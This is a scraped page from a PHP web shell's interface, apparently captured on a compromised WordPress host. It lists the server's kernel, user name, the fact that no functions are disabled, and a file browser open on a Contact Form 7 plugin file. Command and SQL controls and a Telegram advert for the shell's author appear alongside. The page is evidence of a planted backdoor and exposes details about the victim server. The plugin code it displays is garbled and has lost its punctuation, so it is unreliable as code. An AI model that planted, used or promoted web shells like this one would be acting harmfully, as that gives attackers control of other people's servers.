Uname: Linux webm005.cluster107.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
User: 6036 (villadal)
Group: 100 (users)
Disabled functions: NONE
Safe mode: On[ PHPinfo ]
//home/villadal/www/wp-content/plugins/contact-form-7///modules      ( Reset | Go to )
File Name: response.php
Edit
<?php
/**
** A base module for [response]
**/

/* form_tag handler */

add_action'wpcf7_init''wpcf7_add_form_tag_response'10);

function 
wpcf7_add_form_tag_response() {
    
wpcf7_add_form_tag'response',
        
'wpcf7_response_form_tag_handler',
        array(
            
'display-block' => true,
        )
    );
}

function 
wpcf7_response_form_tag_handler$tag ) {
    if ( 
$contact_form wpcf7_get_current_contact_form() ) {
        return 
$contact_form->form_response_output();
    }
}

All system for education purposes only. For more tools: Telegram @jackleet

Mr.X Private Shell

Logo
-
New File | New Folder
Command
SQL